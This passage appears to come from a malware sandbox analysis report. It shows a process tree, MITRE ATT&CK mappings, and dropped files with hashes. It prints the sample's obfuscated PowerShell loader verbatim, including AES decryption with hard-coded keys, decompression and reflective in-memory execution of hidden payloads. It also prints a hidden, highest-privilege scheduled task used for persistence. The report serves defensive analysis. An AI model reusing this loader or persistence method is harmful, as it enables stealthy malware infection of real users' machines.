$ycQqn=$cavJU.Substring(20); break; }}$payloads_var=[string[]]$ycQqn.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
    3⤵
    PID:4568
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2844
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName '$phantom-RuntimeBroker_startup_25_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_25.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4596
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\$phantom-startup_str_25.vbs"
      4⤵
      Checks computer location settings
      Suspicious use of WriteProcessMemory
      PID:564
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\$phantom-startup_str_25.bat" "
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4528
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dyVGy+AK/alUx4C1KZGPyURnZpXePTKfrvzd88J4h2c='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('EtptwhXr1MaRHHI/4/0emw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $JxCCm=New-Object System.IO.MemoryStream(,$param_var); $fscLF=New-Object System.IO.MemoryStream; $beNoU=New-Object System.IO.Compression.GZipStream($JxCCm, [IO.Compression.CompressionMode]::Decompress); $beNoU.CopyTo($fscLF); $beNoU.Dispose(); $JxCCm.Dispose(); $fscLF.Dispose(); $fscLF.ToArray();}function execute_function($param_var,$param2_var){ $eJqYy=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $wnjdB=$eJqYy.EntryPoint; $wnjdB.Invoke($null, $param2_var);}$pMUKG = 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_25.bat';$host.UI.RawUI.WindowTitle = $pMUKG;$hJjhE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($pMUKG).Split([Environment]::NewLine);foreach ($cavJU in $hJjhE) { if ($cavJU.StartsWith('cypLHeqrkKMWSgQqffJU')) { $ycQqn=$cavJU.Substring(20); break; }}$payloads_var=[string[]]$ycQqn.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
        6⤵
        
        PID:2012
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
        6⤵
        Command and Scripting Interpreter: PowerShell
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:3496

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3672

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:4940

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
1⤵
PID:4884

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
PID:3692

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
- Modifies data under HKEY_USERS
PID:712

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:4848

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
1⤵
PID:2572

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
2KB

MD5
80b08b611f1f7ee7f1bba68444c29dd7

SHA1
22f60b429e49f8a3a260c87c0806a1cd4a970692

SHA256
48ec3b10db2c486343a2154708b2fc08c01f2458d82b588dfdce3a97128790ac

SHA512
ecca9e00c8252957c340b01ca6272fd958167f3b09494bd73330916e3f58b7389c1254e9f9304abefc5d1646f8ff8527ed70f3ce40cfd2e4dd2426ae67a68553

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fjwnmex1.jnc.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\$phantom-startup_str_25.bat

Filesize
5.8MB

MD5
f3281ed9a501fd2ff062664456bd3016

SHA1
4e41be0fe4bf26907eaa738fffaabf10651c15b5

SHA256
3e27d2aee2a3f3a1f28e27100ed8b966ee82a85ec94d8d715f390d824e20abba

SHA512
cbd41cc54655e2fc7159d4cf50c6b0424b7caf927016735bf1e84b1b69ff58cf12abcee724af99f2c0aba7e176393477c16cf183d99c48163d9b85f8e7aaf1b4

Download Submit
C:\Users\Admin\AppData\Roaming\$phantom-startup_str_25.vbs

Filesize
123B

MD5
4f596628384c3249d77fe0f0dc8cb945

SHA1
70847ea80252ea857a283233662d20b49adb3aef

SHA256
03f4d597f322ecab049e2f4bd538526a952878166c81ee0430e0858e0233ac23

SHA512
d7877d9fb9990c48fd46736c9f3012c8632857ed91969fce0de71488c0f8ee2cb3873569a05fd75177010a90de90b560b4f4b2457b8d31f42b798a45f30f938b

Download Submit
memory/776-111-0x00007FFCF8BF0000-0x00007FFCF8C00000-memory.dmp

Filesize
64KB

Download
memory/984-99-0x00007FFCF8BF0000-0x00007FFCF8C00000-memory.dmp

Filesize
64KB

Download
memory/1220-110-0x00007FFCF8BF0000-0x00007FFCF8C00000-memory.dmp

Filesize
64KB

Download
memory/1292-112-0x00007FFCF8BF0000-0x00007FFCF8C00000-memory.dmp

Filesize
64KB

Download
memory/1328-107-0x00007FFCF8BF0000-0x00007FFCF8C00000-memory.dmp

Filesize
64KB

Download
memory/1488-103-0x00007FFCF8BF0000-0x00007FFCF8C00000-memory.dmp

Filesize
64KB

Download
memory/1524-106-0x00007FFCF8BF0000-0x00007FFCF8C00000-memory.dmp

Filesize
64KB

Download
memory/1712-108-0x00007FFCF8BF0000-0x00007FFCF8C00000-memory.dmp

Filesize
64KB

Download
memory/1768-104-0x00007FFCF8BF0000-0x00007FFCF8C00000-memory.dmp

Filesize
64KB

Download
memory/1804-109-0x00007FFCF8BF0000-0x00007FFCF8C00000-memory.dmp

Filesize
64KB

Download
memory/2292-101-0x00007FFCF8BF0000-0x00007FFCF8C00000-memory.dmp

Filesize
64KB

Download
memory/2788-105-0x00007FFCF8BF0000-0x00007FFCF8C00000-memory.dmp

Filesize
64KB

Download
memory/2844-10-0x00007FFD1AAC0000-0x00007FFD1B581000-memory.dmp

Filesize
10.8MB

Download
memory/2844-40-0x00007FFD1AAC0000-0x00007FFD1B581000-memory.dmp

Filesize
10.8MB

Download
memory/2844-11-0x000001CD04B90000-0x000001CD04BB2000-memory.dmp

Filesize
136KB

Download
memory/2844-13-0x000001CD01870000-0x000001CD018B4000-memory.dmp

Filesize
272KB

Download
memory/2844-39-0x000001CD04840000-0x000001CD04A5C000-memory.dmp

Filesize
2.1MB

Download
memory/2844-12-0x00007FFD1AAC0000-0x00007FFD1B581000-memory.dmp

Filesize
10.8MB

Download
memory/2844-16-0x000001CD018C0000-0x000001CD01916000-memory.dmp

Filesize
344KB

Download
memory/2844-15-0x000001CD01850000-0x000001CD01858000-memory.dmp

Filesize
32KB

Download
memory/2844-14-0x000001CD01940000-0x000001CD019B6000-memory.dmp

Filesize
472KB

Download
memory/2844-0-0x00007FFD1AAC3000-0x00007FFD1AAC5000-memory.dmp

Filesize
8KB

Download
memory/2884-100-0x00007FFCF8BF0000-0x00007FFCF8C00000-memory.dmp

Filesize
64KB

Download
memory/3496-145-0x0000019814D60000-0x0000019814D9C000-memory.dmp

Filesize
240KB

Download
memory/3536-98-0x00007FFCF8BF0000-0x00007FFCF8C00000-memory.dmp

Filesize
64KB

Download
memory/3536-51-0x0000000002820000-0x000000000284A000-memory.dmp

Filesize
168KB

Download
memory/4596-32-0x00007FFD1AAC0000-0x00007FFD1B581000-memory.dmp

Filesize
10.8MB

Download
memory/4596-31-0x000002538B1B0000-0x000002538B3CC000-memory.dmp

Filesize
2.1MB

Download
memory/4596-20-0x00007FFD1AAC0000-0x00007FFD1B581000-memory.dmp

Filesize
10.8MB

Download
memory/4596-19-0x00007FFD1AAC0000-0x00007FFD1B581000-memory.dmp

Filesize
10.8MB

Download
memory/4596-18-0x00007FFD1AAC0000-0x00007FFD1B581000-memory.dmp

Filesize
10.8MB

Download
memory/4848-102-0x00007FFCF8BF0000-0x00007FFCF8C00000-memory.dmp

Filesize
64KB

Download